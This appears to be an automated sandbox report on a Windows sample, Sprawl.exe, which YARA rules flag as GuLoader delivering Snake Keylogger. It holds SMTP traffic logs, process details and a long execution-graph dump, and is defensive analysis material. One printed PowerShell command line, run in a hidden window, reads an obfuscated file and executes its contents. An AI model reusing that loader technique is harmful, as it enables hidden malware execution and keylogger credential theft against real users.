Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Oct 22, 2024 16:12:28.396909952 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6 | 220 kundenserver.de (mreue012) Nemesis ESMTP Service ready
Oct 22, 2024 16:12:28.397146940 CEST | 50027 | 587 | 192.168.2.6 | 213.165.67.102 | EHLO 760639
Oct 22, 2024 16:12:28.397206068 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6 | 220 kundenserver.de (mreue011) Nemesis ESMTP Service ready
Oct 22, 2024 16:12:28.397525072 CEST | 50028 | 587 | 192.168.2.6 | 213.165.67.102 | EHLO 760639
Oct 22, 2024 16:12:28.674257040 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6 | 250-kundenserver.de Hello 760639 [173.254.250.76]
250-8BITMIME
250-SIZE 141557760
250 STARTTLS
Oct 22, 2024 16:12:28.677109003 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6 | 250-kundenserver.de Hello 760639 [173.254.250.76]
250-8BITMIME
250-SIZE 141557760
250 STARTTLS
Oct 22, 2024 16:12:28.752207994 CEST | 50027 | 587 | 192.168.2.6 | 213.165.67.102 | STARTTLS
Oct 22, 2024 16:12:28.752315998 CEST | 50028 | 587 | 192.168.2.6 | 213.165.67.102 | STARTTLS
Oct 22, 2024 16:12:28.997915030 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6 | 220 OK
Oct 22, 2024 16:12:28.999497890 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6 | 220 OK

                                                                                                                          Target ID:0
                                                                                                                          Start time:10:10:30
                                                                                                                          Start date:22/10/2024
                                                                                                                          Path:C:\Users\user\Desktop\Sprawl.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\Sprawl.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:880'264 bytes
                                                                                                                          MD5 hash:47FD98348B7D314E4E9DAE46E5F1E1A1
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:2
                                                                                                                          Start time:10:10:32
                                                                                                                          Start date:22/10/2024
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
                                                                                                                          Imagebase:0xcb0000
                                                                                                                          File size:433'152 bytes
                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2786477517.000000000B78B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:3
                                                                                                                          Start time:10:10:33
                                                                                                                          Start date:22/10/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:4
                                                                                                                          Start time:10:10:37
                                                                                                                          Start date:22/10/2024
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
                                                                                                                          Imagebase:0xcb0000
                                                                                                                          File size:433'152 bytes
                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2855794933.000000000B95D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:5
                                                                                                                          Start time:10:10:37
                                                                                                                          Start date:22/10/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:8
                                                                                                                          Start time:10:11:31
                                                                                                                          Start date:22/10/2024
                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                          Imagebase:0x640000
                                                                                                                          File size:59'904 bytes
                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.3358316175.0000000005B30000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:9
                                                                                                                          Start time:10:11:31
                                                                                                                          Start date:22/10/2024
                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                          Imagebase:0x640000
                                                                                                                          File size:59'904 bytes
                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.3358056875.0000000006390000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:26.2%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:23.3%
                                                                                                                            Total number of Nodes:1256
                                                                                                                            Total number of Limit Nodes:42
2982->2987 2983->2960 2985 404e55 2983->2985 2984->2982 3004 4047ce 2985->3004 2987->2982 2988->2980 2989->2948 2991 404872 SendMessageA 2990->2991 2992 404836 GetMessagePos ScreenToClient SendMessageA 2990->2992 2993 40486a 2991->2993 2992->2993 2994 40486f 2992->2994 2993->2970 2994->2991 3007 405d2f lstrcpynA 2995->3007 2997 4048a6 3008 405c8d wsprintfA 2997->3008 2999 4048b0 3000 40140b 2 API calls 2999->3000 3001 4048b9 3000->3001 3009 405d2f lstrcpynA 3001->3009 3003 4048c0 3003->2981 3010 404709 3004->3010 3006 4047e3 3006->2960 3007->2997 3008->2999 3009->3003 3011 40471f 3010->3011 3012 405d51 18 API calls 3011->3012 3013 404783 3012->3013 3014 405d51 18 API calls 3013->3014 3015 40478e 3014->3015 3016 405d51 18 API calls 3015->3016 3017 4047a4 lstrlenA wsprintfA SetDlgItemTextA 3016->3017 3017->3006 3664 4026c6 3665 402a3a 18 API calls 3664->3665 3666 4026d4 3665->3666 3667 4026ea 3666->3667 3668 402a3a 18 API calls 3666->3668 3669 40597d 2 API calls 3667->3669 3668->3667 3670 4026f0 3669->3670 3692 4059a2 GetFileAttributesA CreateFileA 3670->3692 3672 4026fd 3673 4027a0 3672->3673 3674 402709 GlobalAlloc 3672->3674 3675 4027a8 DeleteFileA 3673->3675 3676 4027bb 3673->3676 3677 402722 3674->3677 3678 402797 CloseHandle 3674->3678 3675->3676 3693 4030c7 SetFilePointer 3677->3693 3678->3673 3680 402728 3681 4030b1 ReadFile 3680->3681 3682 402731 GlobalAlloc 3681->3682 3683 402741 3682->3683 3684 402775 3682->3684 3685 402e9f 32 API calls 3683->3685 3686 405a49 WriteFile 3684->3686 3691 40274e 3685->3691 3687 402781 GlobalFree 3686->3687 3688 402e9f 32 API calls 3687->3688 3689 402794 3688->3689 3689->3678 3690 40276c GlobalFree 3690->3684 3691->3690 3692->3672 3693->3680 3694 402847 3695 402a1d 18 API calls 3694->3695 3696 40284d 3695->3696 3697 40287e 3696->3697 3698 4026a6 3696->3698 3699 40285b 3696->3699 3697->3698 3700 405d51 18 API calls 3697->3700 3699->3698 3702 405c8d wsprintfA 3699->3702 3700->3698 3702->3698 3703 4022c7 3704 402a3a 18 API calls 
3703->3704 3705 4022d8 3704->3705 3706 402a3a 18 API calls 3705->3706 3707 4022e1 3706->3707 3708 402a3a 18 API calls 3707->3708 3709 4022eb GetPrivateProfileStringA 3708->3709 3054 401bca 3055 402a1d 18 API calls 3054->3055 3056 401bd1 3055->3056 3057 402a1d 18 API calls 3056->3057 3058 401bdb 3057->3058 3059 401beb 3058->3059 3060 402a3a 18 API calls 3058->3060 3061 401bfb 3059->3061 3062 402a3a 18 API calls 3059->3062 3060->3059 3063 401c06 3061->3063 3064 401c4a 3061->3064 3062->3061 3065 402a1d 18 API calls 3063->3065 3066 402a3a 18 API calls 3064->3066 3067 401c0b 3065->3067 3068 401c4f 3066->3068 3069 402a1d 18 API calls 3067->3069 3070 402a3a 18 API calls 3068->3070 3071 401c14 3069->3071 3072 401c58 FindWindowExA 3070->3072 3073 401c3a SendMessageA 3071->3073 3074 401c1c SendMessageTimeoutA 3071->3074 3075 401c76 3072->3075 3073->3075 3074->3075 3491 401751 3492 402a3a 18 API calls 3491->3492 3493 401758 3492->3493 3494 401776 3493->3494 3495 40177e 3493->3495 3530 405d2f lstrcpynA 3494->3530 3531 405d2f lstrcpynA 3495->3531 3498 40177c 3502 405f9a 5 API calls 3498->3502 3499 401789 3500 4057a1 3 API calls 3499->3500 3501 40178f lstrcatA 3500->3501 3501->3498 3515 40179b 3502->3515 3503 406033 2 API calls 3503->3515 3504 40597d 2 API calls 3504->3515 3506 4017b2 CompareFileTime 3506->3515 3507 401876 3508 404f48 25 API calls 3507->3508 3510 401880 3508->3510 3509 404f48 25 API calls 3511 401862 3509->3511 3512 402e9f 32 API calls 3510->3512 3514 401893 3512->3514 3513 405d2f lstrcpynA 3513->3515 3516 4018a7 SetFileTime 3514->3516 3518 4018b9 CloseHandle 3514->3518 3515->3503 3515->3504 3515->3506 3515->3507 3515->3513 3517 405d51 18 API calls 3515->3517 3526 405525 MessageBoxIndirectA 3515->3526 3528 40184d 3515->3528 3529 4059a2 GetFileAttributesA CreateFileA 3515->3529 3516->3518 3517->3515 3518->3511 3519 4018ca 3518->3519 3520 4018e2 3519->3520 3521 4018cf 3519->3521 3522 405d51 18 API calls 3520->3522 3523 405d51 18 API calls 3521->3523 3525 4018ea 
3522->3525 3524 4018d7 lstrcatA 3523->3524 3524->3525 3527 405525 MessageBoxIndirectA 3525->3527 3526->3515 3527->3511 3528->3509 3528->3511 3529->3515 3530->3498 3531->3499 3713 401651 3714 402a3a 18 API calls 3713->3714 3715 401657 3714->3715 3716 406033 2 API calls 3715->3716 3717 40165d 3716->3717 3718 401951 3719 402a1d 18 API calls 3718->3719 3720 401958 3719->3720 3721 402a1d 18 API calls 3720->3721 3722 401962 3721->3722 3723 402a3a 18 API calls 3722->3723 3724 40196b 3723->3724 3725 40197e lstrlenA 3724->3725 3730 4019b9 3724->3730 3726 401988 3725->3726 3726->3730 3731 405d2f lstrcpynA 3726->3731 3728 4019a2 3729 4019af lstrlenA 3728->3729 3728->3730 3729->3730 3731->3728 3532 404352 3533 40437e 3532->3533 3534 40438f 3532->3534 3601 405509 GetDlgItemTextA 3533->3601 3536 404407 3534->3536 3537 40439b GetDlgItem 3534->3537 3543 405d51 18 API calls 3536->3543 3554 4044de 3536->3554 3595 404688 3536->3595 3539 4043af 3537->3539 3538 404389 3540 405f9a 5 API calls 3538->3540 3541 4043c3 SetWindowTextA 3539->3541 3547 40583a 4 API calls 3539->3547 3540->3534 3545 403f14 19 API calls 3541->3545 3548 40446e SHBrowseForFolderA 3543->3548 3544 40450e 3549 40588f 18 API calls 3544->3549 3550 4043df 3545->3550 3546 403f7b 8 API calls 3551 40469c 3546->3551 3552 4043b9 3547->3552 3553 404486 CoTaskMemFree 3548->3553 3548->3554 3555 404514 3549->3555 3556 403f14 19 API calls 3550->3556 3552->3541 3559 4057a1 3 API calls 3552->3559 3557 4057a1 3 API calls 3553->3557 3554->3595 3599 405509 GetDlgItemTextA 3554->3599 3600 405d2f lstrcpynA 3555->3600 3558 4043ed 3556->3558 3560 404493 3557->3560 3598 403f49 SendMessageA 3558->3598 3559->3541 3563 4044ca SetDlgItemTextA 3560->3563 3568 405d51 18 API calls 3560->3568 3563->3554 3564 40452b 3566 4060c8 5 API calls 3564->3566 3565 4043f3 3567 4060c8 5 API calls 3565->3567 3577 404532 3566->3577 3569 4043fa 3567->3569 3570 4044b2 lstrcmpiA 3568->3570 3572 404402 SHAutoComplete 3569->3572 3569->3595 3570->3563 3574 4044c3 
lstrcatA 3570->3574 3571 40456e 3602 405d2f lstrcpynA 3571->3602 3572->3536 3574->3563 3575 404541 GetDiskFreeSpaceExA 3575->3577 3585 4045c6 3575->3585 3576 404575 3578 40583a 4 API calls 3576->3578 3577->3571 3577->3575 3580 4057e8 2 API calls 3577->3580 3579 40457b 3578->3579 3581 404581 3579->3581 3582 404584 GetDiskFreeSpaceA 3579->3582 3580->3577 3581->3582 3583 40459f MulDiv 3582->3583 3582->3585 3583->3585 3584 404637 3587 40465a 3584->3587 3589 40140b 2 API calls 3584->3589 3585->3584 3586 4047ce 21 API calls 3585->3586 3588 404624 3586->3588 3603 403f36 EnableWindow 3587->3603 3591 404639 SetDlgItemTextA 3588->3591 3592 404629 3588->3592 3589->3587 3591->3584 3594 404709 21 API calls 3592->3594 3593 404676 3593->3595 3596 404683 3593->3596 3594->3584 3595->3546 3604 4042e7 3596->3604 3598->3565 3599->3544 3600->3564 3601->3538 3602->3576 3603->3593 3605 4042f5 3604->3605 3606 4042fa SendMessageA 3604->3606 3605->3606 3606->3595 3732 4019d2 3733 402a3a 18 API calls 3732->3733 3734 4019d9 3733->3734 3735 402a3a 18 API calls 3734->3735 3736 4019e2 3735->3736 3737 4019e9 lstrcmpiA 3736->3737 3738 4019fb lstrcmpA 3736->3738 3739 4019ef 3737->3739 3738->3739 3740 4021d2 3741 402a3a 18 API calls 3740->3741 3742 4021d8 3741->3742 3743 402a3a 18 API calls 3742->3743 3744 4021e1 3743->3744 3745 402a3a 18 API calls 3744->3745 3746 4021ea 3745->3746 3747 406033 2 API calls 3746->3747 3748 4021f3 3747->3748 3749 402204 lstrlenA lstrlenA 3748->3749 3753 4021f7 3748->3753 3750 404f48 25 API calls 3749->3750 3752 402240 SHFileOperationA 3750->3752 3751 404f48 25 API calls 3754 4021ff 3751->3754 3752->3753 3752->3754 3753->3751 3753->3754 3755 4014d6 3756 402a1d 18 API calls 3755->3756 3757 4014dc Sleep 3756->3757 3759 4028cf 3757->3759 3760 40155b 3761 401577 ShowWindow 3760->3761 3762 40157e 3760->3762 3761->3762 3763 40158c ShowWindow 3762->3763 3764 4028cf 3762->3764 3763->3764 3765 40255c 3766 402a1d 18 API calls 3765->3766 3769 402566 3766->3769 3767 4025d0 3768 
405a1a ReadFile 3768->3769 3769->3767 3769->3768 3770 4025d2 3769->3770 3773 4025e2 3769->3773 3774 405c8d wsprintfA 3770->3774 3772 4025f8 SetFilePointer 3772->3767 3773->3767 3773->3772 3774->3767 3775 40405d 3776 404073 3775->3776 3781 40417f 3775->3781 3779 403f14 19 API calls 3776->3779 3777 4041ee 3778 4042c2 3777->3778 3780 4041f8 GetDlgItem 3777->3780 3786 403f7b 8 API calls 3778->3786 3782 4040c9 3779->3782 3783 404280 3780->3783 3784 40420e 3780->3784 3781->3777 3781->3778 3785 4041c3 GetDlgItem SendMessageA 3781->3785 3787 403f14 19 API calls 3782->3787 3783->3778 3789 404292 3783->3789 3784->3783 3788 404234 6 API calls 3784->3788 3806 403f36 EnableWindow 3785->3806 3791 4042bd 3786->3791 3792 4040d6 CheckDlgButton 3787->3792 3788->3783 3793 404298 SendMessageA 3789->3793 3794 4042a9 3789->3794 3804 403f36 EnableWindow 3792->3804 3793->3794 3794->3791 3798 4042af SendMessageA 3794->3798 3795 4041e9 3799 4042e7 SendMessageA 3795->3799 3797 4040f4 GetDlgItem 3805 403f49 SendMessageA 3797->3805 3798->3791 3799->3777 3801 40410a SendMessageA 3802 404131 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3801->3802 3803 404128 GetSysColor 3801->3803 3802->3791 3803->3802 3804->3797 3805->3801 3806->3795 3807 40205e 3808 402a3a 18 API calls 3807->3808 3809 402065 3808->3809 3810 402a3a 18 API calls 3809->3810 3811 40206f 3810->3811 3812 402a3a 18 API calls 3811->3812 3813 402079 3812->3813 3814 402a3a 18 API calls 3813->3814 3815 402083 3814->3815 3816 402a3a 18 API calls 3815->3816 3817 40208d 3816->3817 3818 4020cc CoCreateInstance 3817->3818 3819 402a3a 18 API calls 3817->3819 3822 4020eb 3818->3822 3824 402193 3818->3824 3819->3818 3820 401423 25 API calls 3821 4021c9 3820->3821 3823 402173 MultiByteToWideChar 3822->3823 3822->3824 3823->3824 3824->3820 3824->3821 3825 40265e 3826 402664 3825->3826 3827 402668 FindNextFileA 3826->3827 3829 40267a 3826->3829 3828 4026b9 3827->3828 3827->3829 3831 405d2f lstrcpynA 3828->3831 3831->3829 3832 401cde 
GetDlgItem GetClientRect 3833 402a3a 18 API calls 3832->3833 3834 401d0e LoadImageA SendMessageA 3833->3834 3835 401d2c DeleteObject 3834->3835 3836 4028cf 3834->3836 3835->3836 3837 401662 3838 402a3a 18 API calls 3837->3838 3839 401669 3838->3839 3840 402a3a 18 API calls 3839->3840 3841 401672 3840->3841 3842 402a3a 18 API calls 3841->3842 3843 40167b MoveFileA 3842->3843 3844 401687 3843->3844 3845 40168e 3843->3845 3847 401423 25 API calls 3844->3847 3846 406033 2 API calls 3845->3846 3849 4021c9 3845->3849 3848 40169d 3846->3848 3847->3849 3848->3849 3850 405bea 38 API calls 3848->3850 3850->3844 2886 402364 2887 40236a 2886->2887 2888 402a3a 18 API calls 2887->2888 2889 40237c 2888->2889 2890 402a3a 18 API calls 2889->2890 2891 402386 RegCreateKeyExA 2890->2891 2892 4023b0 2891->2892 2893 4028cf 2891->2893 2894 4023c8 2892->2894 2895 402a3a 18 API calls 2892->2895 2896 4023d4 2894->2896 2903 402a1d 2894->2903 2897 4023c1 lstrlenA 2895->2897 2899 4023ef RegSetValueExA 2896->2899 2906 402e9f 2896->2906 2897->2894 2900 402405 RegCloseKey 2899->2900 2900->2893 2904 405d51 18 API calls 2903->2904 2905 402a31 2904->2905 2905->2896 2907 402eb5 2906->2907 2908 402ee3 2907->2908 2931 4030c7 SetFilePointer 2907->2931 2926 4030b1 2908->2926 2912 402f00 GetTickCount 2915 403034 2912->2915 2922 402f4f 2912->2922 2913 40304a 2914 40308c 2913->2914 2919 40304e 2913->2919 2916 4030b1 ReadFile 2914->2916 2915->2899 2916->2915 2917 4030b1 ReadFile 2917->2922 2918 4030b1 ReadFile 2918->2919 2919->2915 2919->2918 2920 405a49 WriteFile 2919->2920 2920->2919 2921 402fa5 GetTickCount 2921->2922 2922->2915 2922->2917 2922->2921 2923 402fca MulDiv wsprintfA 2922->2923 2929 405a49 WriteFile 2922->2929 2924 404f48 25 API calls 2923->2924 2924->2922 2932 405a1a ReadFile 2926->2932 2930 405a67 2929->2930 2930->2922 2931->2908 2933 402eee 2932->2933 2933->2912 2933->2913 2933->2915 3851 401dea 3852 402a3a 18 API calls 3851->3852 3853 401df0 3852->3853 3854 402a3a 18 API calls 3853->3854 
3855 401df9 3854->3855 3856 402a3a 18 API calls 3855->3856 3857 401e02 3856->3857 3858 402a3a 18 API calls 3857->3858 3859 401e0b 3858->3859 3860 401423 25 API calls 3859->3860 3861 401e12 ShellExecuteA 3860->3861 3862 401e3f 3861->3862 3863 40366d 3864 403678 3863->3864 3865 40367f GlobalAlloc 3864->3865 3866 40367c 3864->3866 3865->3866 3867 401eee 3868 402a3a 18 API calls 3867->3868 3869 401ef5 3868->3869 3870 4060c8 5 API calls 3869->3870 3871 401f04 3870->3871 3872 401f1c GlobalAlloc 3871->3872 3881 401f84 3871->3881 3873 401f30 3872->3873 3872->3881 3874 4060c8 5 API calls 3873->3874 3875 401f37 3874->3875 3876 4060c8 5 API calls 3875->3876 3877 401f41 3876->3877 3877->3881 3882 405c8d wsprintfA 3877->3882 3879 401f78 3883 405c8d wsprintfA 3879->3883 3882->3879 3883->3881 3884 4014f0 SetForegroundWindow 3885 4028cf 3884->3885 3891 4018f5 3892 40192c 3891->3892 3893 402a3a 18 API calls 3892->3893 3894 401931 3893->3894 3895 4055d1 69 API calls 3894->3895 3896 40193a 3895->3896 3897 4024f7 3898 402a3a 18 API calls 3897->3898 3899 4024fe 3898->3899 3902 4059a2 GetFileAttributesA CreateFileA 3899->3902 3901 40250a 3902->3901 3903 4018f8 3904 402a3a 18 API calls 3903->3904 3905 4018ff 3904->3905 3906 405525 MessageBoxIndirectA 3905->3906 3907 401908 3906->3907 3908 4014fe 3909 401506 3908->3909 3911 401519 3908->3911 3910 402a1d 18 API calls 3909->3910 3910->3911 3912 402b7f 3913 402ba7 3912->3913 3914 402b8e SetTimer 3912->3914 3915 402bfc 3913->3915 3916 402bc1 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3913->3916 3914->3913 3916->3915 3917 401000 3918 401037 BeginPaint GetClientRect 3917->3918 3919 40100c DefWindowProcA 3917->3919 3921 4010f3 3918->3921 3922 401179 3919->3922 3923 401073 CreateBrushIndirect FillRect DeleteObject 3921->3923 3924 4010fc 3921->3924 3923->3921 3925 401102 CreateFontIndirectA 3924->3925 3926 401167 EndPaint 3924->3926 3925->3926 3927 401112 6 API calls 3925->3927 3926->3922 3927->3926 3928 401b02 3929 402a3a 18 API calls 
3928->3929 3930 401b09 3929->3930 3931 402a1d 18 API calls 3930->3931 3932 401b12 wsprintfA 3931->3932 3933 4028cf 3932->3933 3934 402482 3935 402b44 19 API calls 3934->3935 3936 40248c 3935->3936 3937 402a1d 18 API calls 3936->3937 3938 402495 3937->3938 3939 4024b8 RegEnumValueA 3938->3939 3940 4024ac RegEnumKeyA 3938->3940 3941 4026a6 3938->3941 3939->3941 3942 4024d1 RegCloseKey 3939->3942 3940->3942 3942->3941 2839 401a03 2845 402a3a 2839->2845 2842 401a20 2843 401a33 2842->2843 2844 401a25 lstrcmpA 2842->2844 2844->2843 2846 402a46 2845->2846 2847 405d51 18 API calls 2846->2847 2848 402a67 2847->2848 2849 401a0c ExpandEnvironmentStringsA 2848->2849 2850 405f9a 5 API calls 2848->2850 2849->2842 2849->2843 2850->2849 3944 402283 3945 402291 3944->3945 3946 40228b 3944->3946 3948 402a3a 18 API calls 3945->3948 3949 4022a1 3945->3949 3947 402a3a 18 API calls 3946->3947 3947->3945 3948->3949 3951 402a3a 18 API calls 3949->3951 3953 4022af 3949->3953 3950 402a3a 18 API calls 3952 4022b8 WritePrivateProfileStringA 3950->3952 3951->3953 3953->3950 3954 405086 3955 405231 3954->3955 3956 4050a8 GetDlgItem GetDlgItem GetDlgItem 3954->3956 3958 405261 3955->3958 3959 405239 GetDlgItem CreateThread CloseHandle 3955->3959 3999 403f49 SendMessageA 3956->3999 3961 4052b0 3958->3961 3962 405277 ShowWindow ShowWindow 3958->3962 3963 40528f 3958->3963 3959->3958 3960 405118 3966 40511f GetClientRect GetSystemMetrics SendMessageA SendMessageA 3960->3966 3965 403f7b 8 API calls 3961->3965 4001 403f49 SendMessageA 3962->4001 3964 4052ea 3963->3964 3968 4052c3 ShowWindow 3963->3968 3969 40529f 3963->3969 3964->3961 3975 4052f7 SendMessageA 3964->3975 3970 4052bc 3965->3970 3973 405171 SendMessageA SendMessageA 3966->3973 3974 40518d 3966->3974 3971 4052e3 3968->3971 3972 4052d5 3968->3972 3976 403eed SendMessageA 3969->3976 3978 403eed SendMessageA 3971->3978 3977 404f48 25 API calls 3972->3977 3973->3974 3979 4051a0 3974->3979 3980 405192 SendMessageA 3974->3980 3975->3970 3981 
405310 CreatePopupMenu 3975->3981 3976->3961 3977->3971 3978->3964 3983 403f14 19 API calls 3979->3983 3980->3979 3982 405d51 18 API calls 3981->3982 3984 405320 AppendMenuA 3982->3984 3985 4051b0 3983->3985 3986 405351 TrackPopupMenu 3984->3986 3987 40533e GetWindowRect 3984->3987 3988 4051b9 ShowWindow 3985->3988 3989 4051ed GetDlgItem SendMessageA 3985->3989 3986->3970 3990 40536d 3986->3990 3987->3986 3991 4051dc 3988->3991 3992 4051cf ShowWindow 3988->3992 3989->3970 3993 405214 SendMessageA SendMessageA 3989->3993 3994 40538c SendMessageA 3990->3994 4000 403f49 SendMessageA 3991->4000 3992->3991 3993->3970 3994->3994 3995 4053a9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3994->3995 3997 4053cb SendMessageA 3995->3997 3997->3997 3998 4053ed GlobalUnlock SetClipboardData CloseClipboard 3997->3998 3998->3970 3999->3960 4000->3989 4001->3963 3018 402308 3019 402338 3018->3019 3020 40230d 3018->3020 3022 402a3a 18 API calls 3019->3022 3031 402b44 3020->3031 3024 40233f 3022->3024 3023 402314 3025 40231e 3023->3025 3029 402357 3023->3029 3035 402a7a RegOpenKeyExA 3024->3035 3026 402a3a 18 API calls 3025->3026 3027 402325 RegDeleteValueA RegCloseKey 3026->3027 3027->3029 3032 402a3a 18 API calls 3031->3032 3033 402b5d 3032->3033 3034 402b6b RegOpenKeyExA 3033->3034 3034->3023 3040 402aa5 3035->3040 3044 402355 3035->3044 3036 402acb RegEnumKeyA 3037 402add RegCloseKey 3036->3037 3036->3040 3045 4060c8 GetModuleHandleA 3037->3045 3039 402b02 RegCloseKey 3039->3044 3040->3036 3040->3037 3040->3039 3041 402a7a 5 API calls 3040->3041 3041->3040 3043 402b1d RegDeleteKeyA 3043->3044 3044->3029 3046 4060e4 3045->3046 3047 4060ee GetProcAddress 3045->3047 3051 40605a GetSystemDirectoryA 3046->3051 3049 402aed 3047->3049 3049->3043 3049->3044 3050 4060ea 3050->3047 3050->3049 3052 40607c wsprintfA LoadLibraryExA 3051->3052 3052->3050 4002 402688 4003 402a3a 18 API calls 4002->4003 4004 40268f FindFirstFileA 4003->4004 4005 4026b2 4004->4005 4009 4026a2 4004->4009 
4007 4026b9 4005->4007 4010 405c8d wsprintfA 4005->4010 4011 405d2f lstrcpynA 4007->4011 4010->4007 4011->4009 4012 401c8a 4013 402a1d 18 API calls 4012->4013 4014 401c90 IsWindow 4013->4014 4015 4019f3 4014->4015 4016 40430b 4017 404341 4016->4017 4018 40431b 4016->4018 4020 403f7b 8 API calls 4017->4020 4019 403f14 19 API calls 4018->4019 4021 404328 SetDlgItemTextA 4019->4021 4022 40434d 4020->4022 4021->4017 3204 40310f SetErrorMode GetVersion 3205 403146 3204->3205 3206 40314c 3204->3206 3207 4060c8 5 API calls 3205->3207 3208 40605a 3 API calls 3206->3208 3207->3206 3209 403162 lstrlenA 3208->3209 3209->3206 3210 403171 3209->3210 3211 4060c8 5 API calls 3210->3211 3212 403179 3211->3212 3213 4060c8 5 API calls 3212->3213 3214 403180 #17 OleInitialize SHGetFileInfoA 3213->3214 3292 405d2f lstrcpynA 3214->3292 3216 4031bd GetCommandLineA 3293 405d2f lstrcpynA 3216->3293 3218 4031cf GetModuleHandleA 3219 4031e6 3218->3219 3220 4057cc CharNextA 3219->3220 3221 4031fa CharNextA 3220->3221 3229 40320a 3221->3229 3222 4032d4 3223 4032e7 GetTempPathA 3222->3223 3294 4030de 3223->3294 3225 4032ff 3226 403303 GetWindowsDirectoryA lstrcatA 3225->3226 3227 403359 DeleteFileA 3225->3227 3230 4030de 12 API calls 3226->3230 3304 402c66 GetTickCount GetModuleFileNameA 3227->3304 3228 4057cc CharNextA 3228->3229 3229->3222 3229->3228 3234 4032d6 